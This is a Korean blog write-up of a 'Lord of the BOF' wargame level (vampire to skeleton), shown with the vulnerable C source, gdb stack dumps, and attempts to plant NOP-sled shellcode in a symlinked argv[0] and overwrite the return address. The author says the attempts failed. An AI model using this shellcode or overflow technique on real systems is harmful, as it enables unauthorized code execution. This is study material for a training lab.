본문 바로가기
스터디/wargames

[BOF-Wargames] LOB Load of BOF LEVEL10 (Vampire -> Skeleton) 문제풀이

by 깝태 2011. 9. 4.

--------------------------------------------------------------------------------------------------------------------------
Sur3x5f Report - LOB Level10 [ Vampire -> Skeleton ] 
--------------------------------------------------------------------------------------------------------------------------
[vampire@localhost vampire]$ ls
skeleton  skeleton.c

[vampire@localhost vampire]$ cat skeleton.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - skeleton
        - argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i, saved_argc; // 새로운 놈이 등장했군요!

        if(argc < 2){
                printf("argv error\n"); // Argv 2개 이상써야댐
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++) // 환경변수 초기화
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf') // RTL 못 쓰게 금지
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){ // Argv[1] 의 내용 초기화
                printf("argument is too long!\n");
                exit(0);
        }

        // argc saver
        saved_argc = argc; // saved_argc 함수를 argc 로 초기화합니다.

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40); // 버퍼 초기화

        // ultra argv hunter!
        for(i=0; i<saved_argc; i++)
                memset(argv[i], 0, strlen(argv[i])); // 인자를 모두 초기화 하는 막강한 놈이군요 -_____- ;
}

인자를 모두 초기화하는 진짜 말 그대로 더러운 놈 입니다.
어떻게 공격을 해야할까요... 보면 Argv[0] 은 프로그램이 실행되면 찌꺼기가 스택의 꼭대기로 올라가는
특이한 성질이 있습니다. 그러니깐 트롤처럼 Argv[0] 에 NOP 와 쉘코드를 넣어주고 소스로 찾는게 아닌
직접 GDB 로 분석해서 꼭대기로 리턴시켜주어야 합니다.

꼭대기에 어떤 찌꺼기가 있는지 확인해보도록 하겠습니다.

[vampire@localhost xodnr]$ ./skeleton aa
stack is still your friend.

[vampire@localhost xodnr]$ ulimit -c unlimited

[vampire@localhost xodnr]$ ./skeleton `python -c 'print "\xbf"*48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)

[vampire@localhost xodnr]$ gdb -q skeleton core
Core was generated by `                                                           '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...ddone.
Reading symbols from /lib/ld-linux.so.2...idone.
#0  0xbfbfbfbf in ?? ()
(gdb) x/50x $esp
0xbffffb30:     0x00000000      0xbffffb74      0xbffffb80      0x40013868
0xbffffb40:     0x00000002      0x08048450      0x00000000      0x08048471
0xbffffb50:     0x08048500      0x00000002      0xbffffb74      0x08048390
0xbffffb60:     0x080486ac      0x4000ae60      0xbffffb6c      0x40013e90
0xbffffb70:     0x00000002      0xbffffc66      0xbffffc71      0x00000000
0xbffffb80:     0xbffffca2      0xbffffcc4      0xbffffcce      0xbffffcdc
0xbffffb90:     0xbffffcfb      0xbffffd0b      0xbffffd24      0xbffffd41
0xbffffba0:     0xbffffd4c      0xbffffd5a      0xbffffd9d      0xbffffdb0
0xbffffbb0:     0xbffffdc5      0xbffffdd5      0xbffffde2      0xbffffe01
0xbffffbc0:     0xbffffe0c      0xbffffe19      0xbffffe21      0xbfffffe4
0xbffffbd0:     0x00000000      0x00000003      0x08048034      0x00000004
0xbffffbe0:     0x00000020      0x00000005      0x00000006      0x00000006
0xbffffbf0:     0x00001000      0x00000007

(gdb)
0xbffffbf8:     0x40000000      0x00000008      0x00000000      0x00000009
0xbffffc08:     0x08048450      0x0000000b      0x000001fd      0x0000000c
0xbffffc18:     0x000001fd      0x0000000d      0x000001fd      0x0000000e
0xbffffc28:     0x000001fd      0x00000010      0x0fe9fbff      0x0000000f
0xbffffc38:     0xbffffc61      0x00000000      0x00000000      0x00000000
0xbffffc48:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc58:     0x00000000      0x00000000      0x38366900      0x00000036
0xbffffc68:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc78:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc88:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc98:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffca8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffcb8:     0x00000000      0x00000000

(gdb)
0xbffffcc0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffcd0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffce0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffcf0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd00:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd10:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd20:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd30:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd40:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd50:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd60:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd70:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd80:     0x00000000      0x00000000

(gdb)
0xbffffd88:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffd98:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffda8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffdb8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffdc8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffdd8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffde8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffdf8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe08:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe18:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe28:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe38:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe48:     0x00000000      0x00000000

(gdb)
0xbffffe50:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe60:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe70:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe80:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe90:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffea0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffeb0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffec0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffed0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffee0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffef0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff00:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff10:     0x00000000      0x00000000

(gdb)
0xbfffff18:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff28:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff38:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff48:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff58:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff68:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff78:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff88:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff98:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffffa8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffffb8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffffc8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffffd8:     0x00000000      0x00000000

(gdb)
0xbfffffe0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffff0:     0x732f2e00      0x656c656b      0x006e6f74      0x00000000
0xc0000000:     Cannot access memory at address 0xc0000000

끝 부분의 약간의 찌꺼기가 남아있는데 그 부분이 파일명, Argv[0] 부분이라고 하는데
정확히 왜 그런건지는 잘 모르겠습니다. 암튼 Argv[0] 을 이용해 공략하면 되는것이고 저번 페이로드처럼
공격하겠습니다.

[vampire@localhost xodnr]$ ln -s skeleton `python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

[vampire@localhost xodnr]$ ll
total 84
-rw-------    1 vampire  vampire     61440 Aug 27 21:13 core
-rwxrwxr-x    1 vampire  vampire     12752 Aug 27 21:10 skeleton
-rw-r--r--    1 vampire  vampire       821 Aug 27 21:10 skeleton.c
lrwxrwxrwx    1 vampire  vampire         8 Aug 27 21:21 ????????????????????????????????????????????????????????????????????????????????????????????????????ë?^1ɱ2?l?ÿ??é?uöë?èêÿÿÿ2ÁQi00tii0cjo?äQT?â?±?Î? -> skeleton

[vampire@localhost xodnr]$ ./`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44 + "\xbf\xfa\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿úÿ¿
Segmentation fault (core dumped)

[vampire@localhost xodnr]$ ./`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44 + "\xfe\xff\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿þÿÿ¿
Segmentation fault (core dumped)

[vampire@localhost xodnr]$ ./`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44 + "\xf0\xff\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿ðÿÿ¿
Segmentation fault (core dumped)
[vampire@localhost xodnr]$ ln -s skeleton `python -c 'print "\x61\x61\xb8\xe0\x8a\x05\x40\x68\xf9\xbf\x0f\x40\xff\xd0"'`

[vampire@localhost xodnr]$ ./`python -c 'print "\x61\x61\xb8\xe0\x8a\x05\x40\x68\xf9\xbf\x0f\x40\xff\xd0"'` `python -c 'print "\x90"*44 + "\x26\xfc\xff\xbf"'`
&üÿ¿
Segmentation fault (core dumped)

그런데 계속해도 쉘이 뜨지를 않아서 코어를 확인해보았더니 정상적으로 들어가있습니다.

(gdb)
0xbfffff68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffff78:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffff88:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffff98:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffffa8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffffb8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffffc8:     0xeb909090      0xc9315e11      0x6c8032b1      0x8001ff0e
0xbfffffd8:     0xf67501e9      0xeae805eb      0x32ffffff      0x306951c1
0xbfffffe8:     0x69697430      0x6f6a6330      0x5451e48a      0xb19ae28a
0xbffffff8:     0x0081ce0c      0x00000000      Cannot access memory at address 0xc0000000

그래서 위의 주소로 이동시켜줘도 쉘이 뜨지를 않길래 한번 짧은 쉘코드를 써보았는데 그래도 쉘이 뜨지를 않았습니다. ㅠ;
이상하게 쉘이 뜨지를 않습니다. 나중에 꼭 다시 풀어보도록 하겠습니다.